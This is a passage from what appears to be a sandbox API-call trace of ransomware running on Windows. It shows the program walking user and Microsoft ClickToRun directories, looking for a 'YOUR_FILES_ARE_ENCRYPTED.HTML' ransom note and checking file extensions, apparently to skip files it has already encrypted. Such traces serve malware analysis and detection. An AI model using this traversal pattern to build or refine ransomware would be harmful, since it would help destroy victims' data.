ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0109.779] StrStrIW (lpFirst="Application Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.779] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Application Data") returned 39 [0109.779] GetProcessHeap () returned 0x600000 [0109.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0109.780] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data") returned="\\\\?\\C:\\Users\\All Users\\Application Data" [0109.780] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data\\*") returned="\\\\?\\C:\\Users\\All Users\\Application Data\\*" [0109.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Application Data\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x626994, ftCreationTime.dwLowDateTime=0x74447960, ftCreationTime.dwHighDateTime=0x74459310, ftLastAccessTime.dwLowDateTime=0x76800a13, ftLastAccessTime.dwHighDateTime=0x8cb5b9c0, ftLastWriteTime.dwLowDateTime=0x2e002e, ftLastWriteTime.dwHighDateTime=0x626bb8, nFileSizeHigh=0x300, nFileSizeLow=0x20002, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="\x14", cAlternateFileName="翿")) returned 0xffffffff [0109.780] GetProcessHeap () returned 0x600000 [0109.780] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0109.781] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Comms", cAlternateFileName="")) returned 1 [0109.781] StrStrIW (lpFirst="Comms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.781] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Comms") returned 28 [0109.781] GetProcessHeap () returned 0x600000 [0109.781] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0109.782] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Comms" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Comms") returned="\\\\?\\C:\\Users\\All Users\\Comms" [0109.782] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Comms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Comms\\*") returned="\\\\?\\C:\\Users\\All Users\\Comms\\*" [0109.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Comms\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xad819da7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xad819da7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0109.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad819da7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad819da7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad81ec43, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad819da7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad819da7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad81ec43, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.782] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.783] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Comms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0109.783] GetProcessHeap () returned 0x600000 [0109.783] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Comms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\comms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.783] GetProcessHeap () returned 0x600000 [0109.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.783] GetProcessHeap () returned 0x600000 [0109.783] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0109.784] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Desktop", cAlternateFileName="")) returned 1 [0109.784] StrStrIW (lpFirst="Desktop", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.784] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Desktop") returned 30 [0109.784] GetProcessHeap () returned 0x600000 [0109.784] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0109.784] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop") returned="\\\\?\\C:\\Users\\All Users\\Desktop" [0109.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop\\*") returned="\\\\?\\C:\\Users\\All Users\\Desktop\\*" [0109.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Desktop\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad819da7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad819da7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad81ec43, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="翿")) returned 0xffffffff [0109.786] GetProcessHeap () returned 0x600000 [0109.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0109.786] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0109.786] StrStrIW (lpFirst="Documents", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.786] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Documents") returned 32 [0109.786] GetProcessHeap () returned 0x600000 [0109.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0109.786] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Documents" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents") returned="\\\\?\\C:\\Users\\All Users\\Documents" [0109.786] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents\\*") returned="\\\\?\\C:\\Users\\All Users\\Documents\\*" [0109.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Documents\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad819da7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xad819da7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad81ec43, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="翿")) returned 0xffffffff [0109.786] GetProcessHeap () returned 0x600000 [0109.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0109.787] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0109.787] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.787] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft") returned 32 [0109.787] GetProcessHeap () returned 0x600000 [0109.787] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0109.788] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft") returned="\\\\?\\C:\\Users\\All Users\\Microsoft" [0109.788] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*" [0109.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xaf8f5dfe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0109.788] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xaf8f5dfe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0109.788] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xada305c0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xada305c0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0109.788] StrStrIW (lpFirst="ClickToRun", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.788] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun") returned 43 [0109.788] GetProcessHeap () returned 0x600000 [0109.788] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.789] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun" [0109.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*" [0109.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xada305c0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae43d985, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0109.789] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xada305c0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae43d985, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.790] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", cAlternateFileName="4BAD32~1")) returned 1 [0109.790] StrStrIW (lpFirst="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.790] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned 80 [0109.790] GetProcessHeap () returned 0x600000 [0109.790] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.790] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" [0109.790] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*" [0109.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xad9759b6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0109.790] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xad9759b6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="..", cAlternateFileName="")) returned 1 [0109.791] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xad8cfba8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad8cfba8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0109.791] StrStrIW (lpFirst="en-us.16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.791] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16") returned 89 [0109.791] GetProcessHeap () returned 0x600000 [0109.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.792] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16" [0109.792] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*" [0109.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xad8cfba8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad8cfba8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0109.792] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xad8cfba8, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xad8cfba8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="..", cAlternateFileName="")) returned 1 [0109.792] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f0737, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f0737, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xad8d439d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="MasterDescriptor.en-us.xml.235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41", cAlternateFileName="MASTER~1.235")) returned 1 [0109.792] StrStrIW (lpFirst="MasterDescriptor.en-us.xml.235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.792] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml.235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41") returned 181 [0109.792] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml.235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41") returned=".235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41" [0109.792] lstrlenW (lpString=".235CC25993F000E992314636C73D2F41D20D3DA3EABD72395D1453BBC11F9E41") returned 65 [0109.792] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f1a63, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f1a63, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1 [0109.792] StrStrIW (lpFirst="s321033.hash", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.792] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\s321033.hash") returned 102 [0109.792] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0109.792] lstrlenW (lpString=".hash") returned 5 [0109.792] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0109.792] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f2f99, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f2f99, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xad8c9607, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x631188, dwReserved1=0x63c218, cFileName="stream.x86.en-us.man.dat.B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29", cAlternateFileName="STREAM~1.B52")) returned 1 [0109.792] StrStrIW (lpFirst="stream.x86.en-us.man.dat.B52A6CC8FB7587F444C47DF3B494EA273D8CB96D932F5714F89DEFF12500AF29", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.792] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 